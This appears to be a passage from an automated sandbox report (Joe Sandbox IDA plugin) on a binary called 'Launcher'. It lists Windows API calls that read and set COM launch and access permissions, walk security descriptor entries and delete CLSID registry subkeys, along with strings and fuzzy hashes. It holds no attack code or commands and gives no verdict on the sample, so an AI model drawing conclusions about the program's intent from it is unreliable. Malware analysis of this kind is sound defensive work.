                                                                                                    • API String ID: 3231755760-0
                                                                                                    • Opcode ID: 1e248da3b46b39eed53e3908faf8022dcbb6c9b6aef05c2806e40519679a8537
                                                                                                    • Instruction ID: ab77cab56207070c13aa267439c76e403c2f5a0016f106ef80160693818706fd
                                                                                                    • Opcode Fuzzy Hash: 1e248da3b46b39eed53e3908faf8022dcbb6c9b6aef05c2806e40519679a8537
                                                                                                    • Instruction Fuzzy Hash: 6DD01232000105BBC7102BE1FC0DA6D3F2BFB6479AF056500F34983420DF3144818B51
                                                                                                    APIs
                                                                                                      • Part of subcall function 0067C61E: GetAclInformation.ADVAPI32(00000000,0067BA07,0000000C,00000002,00000000,0000000C,?,?,0067BA07), ref: 0067C64E
                                                                                                      • Part of subcall function 0067C61E: GetLastError.KERNEL32(?,0067BA07), ref: 0067C658
                                                                                                    • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,0000000C,00000000,0000000C,00000001,?,00000000,00000001,?,?,0067BA75,?,00000001,?), ref: 0067C793
                                                                                                    • GetLastError.KERNEL32(?,0067BA75,?,00000001,?), ref: 0067C79D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$DaclDescriptorInformationSecurity
                                                                                                    • String ID:
                                                                                                    • API String ID: 2174634393-0
                                                                                                    • Opcode ID: 35ab1cd40d3d80bc87bba700e36d771435fb165c89f5949fe1c61b70cd56042c
                                                                                                    • Instruction ID: c4caa8b0d646c75db9a71ddce40b69509e781c2d491eeecc16ae77b15d14f12c
                                                                                                    • Opcode Fuzzy Hash: 35ab1cd40d3d80bc87bba700e36d771435fb165c89f5949fe1c61b70cd56042c
                                                                                                    • Instruction Fuzzy Hash: 26F0A737501136B7D7311A559C44F47BB2AEB407B0F118226FD089B250DF71DC1097E0
                                                                                                    APIs
                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_0001FA70), ref: 0067FAC5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                    • String ID:
                                                                                                    • API String ID: 3192549508-0
                                                                                                    • Opcode ID: 9c9e4c1a1315e0c1ec8e1a01af4cab60039742722462e04fd4d3146ad64875f2
                                                                                                    • Instruction ID: b335cedb468ed733da84df07f2fbb297cb5dc18d727b462a6768fcbe1c68b4d0
                                                                                                    • Opcode Fuzzy Hash: 9c9e4c1a1315e0c1ec8e1a01af4cab60039742722462e04fd4d3146ad64875f2
                                                                                                    • Instruction Fuzzy Hash: 509002B429110596471057705C0DC1525935A58656B439570A08AC5058EF5040805721
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClipboardOpen
                                                                                                    • String ID:
                                                                                                    • API String ID: 2793039342-0
                                                                                                    • Opcode ID: 98e2c32ffe42a1ccc4ac070f1748a5b98061eef938237e7504512d527b312f36
                                                                                                    • Instruction ID: 9a576f970634d5ac394a4d40bf5389e4a23f2f36bcca2a157c4e345e9ec77731
                                                                                                    • Opcode Fuzzy Hash: 98e2c32ffe42a1ccc4ac070f1748a5b98061eef938237e7504512d527b312f36
                                                                                                    • Instruction Fuzzy Hash: 84900271410041DBCF015B10ED084043B32FB453063211294D0554D0319B225422DB00
                                                                                                    APIs
                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 0067C0C6
                                                                                                    • #540.MFC42U(00000488,0066C76E,?,80000000,?,AccessPermission,?,?,?,?), ref: 0067C0F1
                                                                                                    • RegOpenKeyExW.ADVAPI32 ref: 0067C112
                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0067C13A
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0067C151
                                                                                                    • #800.MFC42U ref: 0067C15F
                                                                                                    • malloc.MSVCRT ref: 0067C174
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0067C18D
                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0067C1B4
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0067C1C2
                                                                                                    • free.MSVCRT ref: 0067C1CD
                                                                                                    • GetSecurityDescriptorDacl.ADVAPI32(00000000,?,?,?), ref: 0067C1EC
                                                                                                    • GetLastError.KERNEL32 ref: 0067C1F6
                                                                                                    • #2810.MFC42U(?,Everyone), ref: 0067C21C
                                                                                                    • SendMessageW.USER32(?,00001053,000000FF,?), ref: 0067C250
                                                                                                    • SendMessageW.USER32(?,0000104D,00000000,?), ref: 0067C283
                                                                                                    • SendMessageW.USER32(?,00001053,000000FF,00000002), ref: 0067C29A
                                                                                                    • SendMessageW.USER32(?,0000104C,00000000,?), ref: 0067C2CA
                                                                                                    • free.MSVCRT ref: 0067C2D1
                                                                                                    • GetAce.ADVAPI32(00000000,00000000,?), ref: 0067C2EB
                                                                                                    • LookupAccountSidW.ADVAPI32(00000000,?,?,?,?,?,?), ref: 0067C350
                                                                                                    • #2810.MFC42U(?,%s\%s,?,?), ref: 0067C374
                                                                                                    • #2810.MFC42U(?,?? Unknown Account ??), ref: 0067C38A
                                                                                                    • SendMessageW.USER32(?,00001053,000000FF,?), ref: 0067C3BE
                                                                                                    • SendMessageW.USER32(?,0000104D,00000000,?), ref: 0067C3F5
                                                                                                    • SendMessageW.USER32(?,00001053,000000FF,00000002), ref: 0067C40C
                                                                                                    • LookupAccountSidW.ADVAPI32(00000000,?,?,?,?,?,?), ref: 0067C47D
                                                                                                    • #2810.MFC42U(?,%s\%s,?,?), ref: 0067C4A1
                                                                                                    • #2810.MFC42U(?,?? Unknown Account ??), ref: 0067C4B7
                                                                                                    • SendMessageW.USER32(?,00001053,000000FF,?), ref: 0067C4EB
                                                                                                    • SendMessageW.USER32(?,0000104D,00000000,?), ref: 0067C522
                                                                                                    • SendMessageW.USER32(?,00001053,000000FF,00000002), ref: 0067C539
                                                                                                    • SendMessageW.USER32(?,0000104C,00000000,?), ref: 0067C569
                                                                                                    • #3993.MFC42U(00000001,00000000,?? Unknown ACE ??,00000000,00000000,00000000,00000000), ref: 0067C57F
                                                                                                    • GetAce.ADVAPI32(00000000,00000001,?,00000001,00000000,?? Unknown ACE ??,00000000,00000000,00000000,00000000), ref: 0067C593
                                                                                                    • GetLastError.KERNEL32 ref: 0067C5AC
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$#2810$Close$AccountErrorLastLookupQueryValuefree$#3993#540#800DaclDescriptorH_prolog3_OpenSecuritymalloc
                                                                                                    • String ID: %s\%s$?? Unknown ACE ??$?? Unknown Account ??$Everyone$Yes
                                                                                                    • API String ID: 47226287-2762826609
                                                                                                    • Opcode ID: a44b2fa2c5889b5dd94eb8d697a8bec935dea53010b35e5be1c43ce1c5fa2d9c
                                                                                                    • Instruction ID: 3fb442dd5b4e6cafc86cd4180ef16ad15c185aa385e59b3442dd23d3d29eb64e
                                                                                                    • Opcode Fuzzy Hash: a44b2fa2c5889b5dd94eb8d697a8bec935dea53010b35e5be1c43ce1c5fa2d9c
                                                                                                    • Instruction Fuzzy Hash: C0D1F2F190012DAFDB218F50DC84ADAB7BDFB48314F5086E9E609A7251DB705EC49F68
                                                                                                    APIs
                                                                                                    • __EH_prolog3_catch_GS.LIBCMT ref: 00671877
                                                                                                    • #540.MFC42U(00000058,0066B66A), ref: 00671884
                                                                                                    • #540.MFC42U(00000058,0066B66A), ref: 00671891
                                                                                                    • #540.MFC42U(00000058,0066B66A), ref: 0067189F
                                                                                                    • #4155.MFC42U(00000004,00000058,0066B66A), ref: 006718AD
                                                                                                    • #4155.MFC42U(00000005,00000004,00000058,0066B66A), ref: 006718B7
                                                                                                    • #3517.MFC42U(?,?,?,?,?,?,?,?,?,?,?,?,?,?,006621A0,00000005), ref: 006718DE
                                                                                                    • #858.MFC42U(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006621A0), ref: 006718EB
                                                                                                    • #800.MFC42U(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006621A0), ref: 006718F7
                                                                                                    • #2910.MFC42U(000000FF,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00671910
                                                                                                      • Part of subcall function 0067DB5F: isspace.MSVCRT ref: 0067DB7C
                                                                                                      • Part of subcall function 0067DB5F: isxdigit.MSVCRT ref: 0067DBF6
                                                                                                      • Part of subcall function 0067DB5F: isspace.MSVCRT ref: 0067DC2E
                                                                                                      • Part of subcall function 0067DB5F: isspace.MSVCRT ref: 0067DC49
                                                                                                      • Part of subcall function 0067DB5F: isdigit.MSVCRT ref: 0067DBCD
                                                                                                      • Part of subcall function 0067DB5F: isdigit.MSVCRT ref: 0067DC1A
                                                                                                      • Part of subcall function 0067DB5F: toupper.MSVCRT ref: 0067DBE3
                                                                                                    • #5906.MFC42U(00000000,00000000,00000000,000000FF,00000000,?,?), ref: 00671A67
                                                                                                    • #6205.MFC42U(?,?,00000001,00000000,00000000,00000000,000000FF,00000000,?,?), ref: 00671A80
                                                                                                    • #6205.MFC42U(?,?,00000001,?,?,00000001,00000000,00000000,00000000,000000FF,00000000,?,?), ref: 00671A92
                                                                                                    • #6191.MFC42U(0000002C,?,?,00000001,?,?,00000001,00000000,00000000,00000000,000000FF,00000000,?,?), ref: 00671A9D
                                                                                                    • #800.MFC42U(0000002C,?,?,00000001,?,?,00000001,00000000,00000000,00000000,000000FF,00000000,?,?), ref: 00671AA7
                                                                                                    • #800.MFC42U(0000002C,?,?,00000001,?,?,00000001,00000000,00000000,00000000,000000FF,00000000,?,?), ref: 00671AAF
                                                                                                    • #800.MFC42U(0000002C,?,?,00000001,?,?,00000001,00000000,00000000,00000000,000000FF,00000000,?,?), ref: 00671AB7
                                                                                                    • #1258.MFC42U(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006621A0), ref: 00671B1E
                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 00671B2B
                                                                                                    • #540.MFC42U(00000044,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00671B35
                                                                                                    • #540.MFC42U(00000044,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00671B41
                                                                                                    • #4155.MFC42U(00000004,00000044,00000000,?,?), ref: 00671B4F
                                                                                                    • #4155.MFC42U(00000005,00000004,00000044,00000000,?,?), ref: 00671B59
                                                                                                    • #540.MFC42U(00000005,00000004,00000044,00000000,?,?), ref: 00671B61
                                                                                                    • #3865.MFC42U(?,00000005,00000004,00000044,00000000,?,?), ref: 00671B77
                                                                                                    • #2970.MFC42U(00000000,?,?,?,00000005,00000004,00000044,00000000,?,?), ref: 00671B8C
                                                                                                    • #2910.MFC42U(000000FF,00000000,?,?,?,00000005,00000004,00000044,00000000,?,?), ref: 00671B99
                                                                                                    • #3792.MFC42U(000000FF,00000000,?,?,?,00000005,00000004,00000044,00000000,?,?), ref: 00671BA6
                                                                                                    • #3792.MFC42U(00000000,000000FF,00000000,?,?,?,00000005,00000004,00000044,00000000,?,?), ref: 00671BB8
                                                                                                    • wsprintfW.USER32 ref: 00671BE8
                                                                                                    • #5568.MFC42U(000000FF), ref: 00671BF6
                                                                                                    • #6399.MFC42U(?,?,?,000000FF), ref: 00671C09
                                                                                                    • #800.MFC42U(?,?,?,000000FF), ref: 00671C11
                                                                                                    • #800.MFC42U(?,?,?,000000FF), ref: 00671C19
                                                                                                    • #800.MFC42U(?,?,?,000000FF), ref: 00671C21
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: #800$#540$#4155$isspace$#2910#3792#6205isdigit$#1258#2970#3517#3865#5568#5906#6191#6399#858H_prolog3_H_prolog3_catch_isxdigittoupperwsprintf
                                                                                                    • String ID: %d, %d, %d, %d, %d, %d, %d, %d, %d, %d, %d, %d$,$,
                                                                                                    • API String ID: 708604890-3364495680
                                                                                                    • Opcode ID: d9912ec5ff6387b054ca2f10e0a64ec41161b13fa5223f5be577a0e51cd551ac
                                                                                                    • Instruction ID: 7325466de299021547b6e43b444acd423b0b96a680b7d4694c3d4674f87eb575
                                                                                                    • Opcode Fuzzy Hash: d9912ec5ff6387b054ca2f10e0a64ec41161b13fa5223f5be577a0e51cd551ac
                                                                                                    • Instruction Fuzzy Hash: 39A13B71D0010CEBCF52EFE4C985ADDFBBAAF18700F50852AE109B7141EB706A4ACB54
                                                                                                    APIs
                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 006704BA
                                                                                                      • Part of subcall function 0067D0B6: StringFromGUID2.OLE32(?,?,00000028,?,?,?,?,?,?,?), ref: 0067D152
                                                                                                      • Part of subcall function 0067D0B6: lstrcpyW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 0067D163
                                                                                                      • Part of subcall function 0067D0B6: wsprintfW.USER32 ref: 0067D179
                                                                                                      • Part of subcall function 0067D0B6: RegOpenKeyW.ADVAPI32(80000000,CLSID,?), ref: 0067D1AA
                                                                                                      • Part of subcall function 0067D0B6: RegEnumKeyW.ADVAPI32(?,00000000,?,000000FF), ref: 0067D25C
                                                                                                      • Part of subcall function 0067D0B6: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0067D270
                                                                                                      • Part of subcall function 0067D0B6: wsprintfW.USER32 ref: 0067D286
                                                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 006704E6
                                                                                                    • SetCursor.USER32(00000000), ref: 006704ED
                                                                                                      • Part of subcall function 0067DE06: malloc.MSVCRT ref: 0067DE1E
                                                                                                    • #538.MFC42U(new CSecurityDescriptor failed.), ref: 00670528
                                                                                                    • #800.MFC42U(?,00000000,MakeSelfRelativeSD failed), ref: 00670754
                                                                                                      • Part of subcall function 0067CDEB: free.MSVCRT ref: 0067CE45
                                                                                                      • Part of subcall function 0067CDEB: free.MSVCRT ref: 0067CE55
                                                                                                      • Part of subcall function 0067CDEB: free.MSVCRT ref: 0067CE6D
                                                                                                    • #538.MFC42U(00000000,00000000), ref: 00670575
                                                                                                    • MakeSelfRelativeSD.ADVAPI32(00000000,00000000,?,Interactive,00000001,Administrators,00000001,System,00000001,00000000), ref: 006705BC
                                                                                                    • malloc.MSVCRT ref: 006705C8
                                                                                                    • #538.MFC42U(00000000), ref: 006705F5
                                                                                                    • MakeSelfRelativeSD.ADVAPI32(00000000,00000000,?), ref: 00670610
                                                                                                    • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,000F003F,?), ref: 00670659
                                                                                                    • GetSecurityDescriptorLength.ADVAPI32(?), ref: 00670666
                                                                                                    • RegSetValueExW.ADVAPI32(?,LaunchPermission,00000000,00000003,?,00000000), ref: 0067067C
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00670688
                                                                                                    • free.MSVCRT ref: 0067068F
                                                                                                    • #2634.MFC42U(00000001), ref: 006706B9
                                                                                                    • #2634.MFC42U(00000001,00000001), ref: 006706C6
                                                                                                    • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 006706D9
                                                                                                    • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 006706E9
                                                                                                    • #5977.MFC42U ref: 006706F2
                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 006706FD
                                                                                                    • SetCursor.USER32(00000000), ref: 00670704
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Cursorfree$#538$#2634CloseLoadMakeMessageOpenRelativeSelfSendmallocwsprintf$#5977#800DescriptorEnumFromH_prolog3_LengthSecurityStringValuelstrcpy
                                                                                                    • String ID: Administrators$CSecurityDescriptor::Initialize failed.$Interactive$LaunchPermission$MakeSelfRelativeSD failed$System$new CSecurityDescriptor failed.$psdSelfRelative malloc failed.
                                                                                                    • API String ID: 3894545846-2955734171
                                                                                                    • Opcode ID: 31e35af0d84a7067b3507d8f9af23ff06c397ab68f18c0f42a4af10d98aa8cdf
                                                                                                    • Instruction ID: 4eb522715dba09120c124e5746a0204e3aabb1233b209033f3f831dcb9a0f55c
                                                                                                    • Opcode Fuzzy Hash: 31e35af0d84a7067b3507d8f9af23ff06c397ab68f18c0f42a4af10d98aa8cdf
                                                                                                    • Instruction Fuzzy Hash: A961A171940216EBEB60AF60CC89FEE767BEF54310F0185ACF509AA192CF705A45CB64
                                                                                                    APIs
                                                                                                    • __EH_prolog3.LIBCMT ref: 0067B8DC
                                                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 0067B8F4
                                                                                                    • SetCursor.USER32(00000000), ref: 0067B8FB
                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,000F003F,?), ref: 0067B911
                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 0067B924
                                                                                                    • SetCursor.USER32(00000000), ref: 0067B92B
                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0067B94C
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0067BAA4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Cursor$Load$CloseH_prolog3OpenQueryValue
                                                                                                    • String ID: AccessPermission$Administrators$CSecurityDescriptor::Initialize failed.$DefaultAccessPermission$DefaultLaunchPermission$Interactive$LaunchPermission$System$new CSecurityDescriptor failed.
                                                                                                    • API String ID: 2619828013-2246421441
                                                                                                    • Opcode ID: deba9ee4a6bca0a53c5bb15843e8965cff0dd1f64d2f1ecc16746bd255207467
                                                                                                    • Instruction ID: 70f732c49ff4f00827e230176714f75a4b7f76e7f362d3dbdf14df6a9a742909
                                                                                                    • Opcode Fuzzy Hash: deba9ee4a6bca0a53c5bb15843e8965cff0dd1f64d2f1ecc16746bd255207467
                                                                                                    • Instruction Fuzzy Hash: 13916071A00216EBDF11AFA0DC89FAE7BBBEF48711F145519FA09A6290DF349D00DB64
                                                                                                    APIs
                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 0066FE6A
                                                                                                    • #6330.MFC42U(00000001,00000408), ref: 0066FE73
                                                                                                    • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0066FF2B
                                                                                                    • SendMessageW.USER32(?,00000148,00000000,?), ref: 0066FF44
                                                                                                    • lstrcmpW.KERNEL32(?,None), ref: 0066FF56
                                                                                                    • RegDeleteKeyW.ADVAPI32(80000000,00000000), ref: 0066FFC4
                                                                                                    • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0067000B
                                                                                                    • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00670067
                                                                                                    • SendMessageW.USER32(?,00000148,00000000,?), ref: 00670080
                                                                                                    • lstrcmpW.KERNEL32(?,None), ref: 00670092
                                                                                                    • RegDeleteKeyW.ADVAPI32(80000000,00000000), ref: 00670111
                                                                                                    • #4118.MFC42U ref: 0067011D
                                                                                                    • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00670135
                                                                                                    • #540.MFC42U(?,?,006621A0,DllSurrogate), ref: 00670192
                                                                                                    • #3871.MFC42U(?), ref: 006701A8
                                                                                                    • RegDeleteKeyW.ADVAPI32(80000000,00000000), ref: 006701F7
                                                                                                    • #800.MFC42U(?,TreatAs,?,?), ref: 00670203
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$Delete$lstrcmp$#3871#4118#540#6330#800H_prolog3_
                                                                                                    • String ID: DllSurrogate$InProcHandler32$InProcServer32$JavaClass$LocalServer32$LocalService$None$ServiceParameters$ThreadingModel$TreatAs$msjava.dll
                                                                                                    • API String ID: 3854995924-1653547741
                                                                                                    • Opcode ID: 83865c61df32979a4b2d424ac0bbbadc24493741b0e0bdcafef647a2695ce25b
                                                                                                    • Instruction ID: 226e44566453bbf0d3836090cfe5ba18c1c5ac0aee800ba9e5de3d2248a5c02c
                                                                                                    • Opcode Fuzzy Hash: 83865c61df32979a4b2d424ac0bbbadc24493741b0e0bdcafef647a2695ce25b
                                                                                                    • Instruction Fuzzy Hash: 0E91CE31540616FBEB01EF64CD8BFA73727EF02700F5145A8BE08AF186DAF1AA458755
                                                                                                    APIs
                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 0066C15A
                                                                                                      • Part of subcall function 0067D0B6: StringFromGUID2.OLE32(?,?,00000028,?,?,?,?,?,?,?), ref: 0067D152
                                                                                                      • Part of subcall function 0067D0B6: lstrcpyW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 0067D163
                                                                                                      • Part of subcall function 0067D0B6: wsprintfW.USER32 ref: 0067D179
                                                                                                      • Part of subcall function 0067D0B6: RegOpenKeyW.ADVAPI32(80000000,CLSID,?), ref: 0067D1AA
                                                                                                      • Part of subcall function 0067D0B6: RegEnumKeyW.ADVAPI32(?,00000000,?,000000FF), ref: 0067D25C
                                                                                                      • Part of subcall function 0067D0B6: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0067D270
                                                                                                      • Part of subcall function 0067D0B6: wsprintfW.USER32 ref: 0067D286
                                                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 0066C186
                                                                                                    • SetCursor.USER32(00000000), ref: 0066C18D
                                                                                                      • Part of subcall function 0067DE06: malloc.MSVCRT ref: 0067DE1E
                                                                                                    • #538.MFC42U(new CSecurityDescriptor failed.), ref: 0066C1C8
                                                                                                    • #800.MFC42U(?,00000008,00000000), ref: 0066C1E8
                                                                                                      • Part of subcall function 0067CDEB: free.MSVCRT ref: 0067CE45
                                                                                                      • Part of subcall function 0067CDEB: free.MSVCRT ref: 0067CE55
                                                                                                      • Part of subcall function 0067CDEB: free.MSVCRT ref: 0067CE6D
                                                                                                    • #538.MFC42U(00000000,00000000), ref: 0066C21A
                                                                                                    • MakeSelfRelativeSD.ADVAPI32(00000000,00000000,?,?,00000001,?,System,00000001,00000000), ref: 0066C266
                                                                                                    • malloc.MSVCRT ref: 0066C272
                                                                                                    • #538.MFC42U(00000000), ref: 0066C29F
                                                                                                    • MakeSelfRelativeSD.ADVAPI32(00000000,00000000,?), ref: 0066C2CE
                                                                                                    • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,000F003F,?), ref: 0066C313
                                                                                                    • GetSecurityDescriptorLength.ADVAPI32(?), ref: 0066C320
                                                                                                    • RegSetValueExW.ADVAPI32(?,AccessPermission,00000000,00000003,?,00000000), ref: 0066C336
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0066C342
                                                                                                    • free.MSVCRT ref: 0066C349
                                                                                                    • #2634.MFC42U(00000001), ref: 0066C373
                                                                                                    • #2634.MFC42U(00000001,00000001), ref: 0066C380
                                                                                                    • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 0066C393
                                                                                                    • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 0066C3A3
                                                                                                    • #5977.MFC42U ref: 0066C3AC
                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 0066C3B7
                                                                                                    • SetCursor.USER32(00000000), ref: 0066C3BE
                                                                                                    Strings
                                                                                                    • new CSecurityDescriptor failed., xrefs: 0066C1BD
                                                                                                    • CSecurityDescriptor::Initialize failed., xrefs: 0066C213
                                                                                                    • AccessPermission, xrefs: 0066C32B
                                                                                                    • System, xrefs: 0066C22B
                                                                                                    • psdSelfRelative malloc failed., xrefs: 0066C298
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Cursorfree$#538$#2634CloseLoadMakeMessageOpenRelativeSelfSendmallocwsprintf$#5977#800DescriptorEnumFromH_prolog3_LengthSecurityStringValuelstrcpy
                                                                                                    • String ID: AccessPermission$CSecurityDescriptor::Initialize failed.$System$new CSecurityDescriptor failed.$psdSelfRelative malloc failed.
                                                                                                    • API String ID: 3894545846-3913380516
                                                                                                    • Opcode ID: 82f7be1805118a610dedc8f5623edf59f8c3052509c61309125aece090344fd9
                                                                                                    • Instruction ID: 5b6ce787e16112e17e4355eedd9ddc6d08190d9ab9fb9227fc36301454f392ff
                                                                                                    • Opcode Fuzzy Hash: 82f7be1805118a610dedc8f5623edf59f8c3052509c61309125aece090344fd9
                                                                                                    • Instruction Fuzzy Hash: 3051A13194021AABDB61EF60DC89FEE7B7AEF55310F0085ACF509AA192DF705A44CF64
                                                                                                    APIs
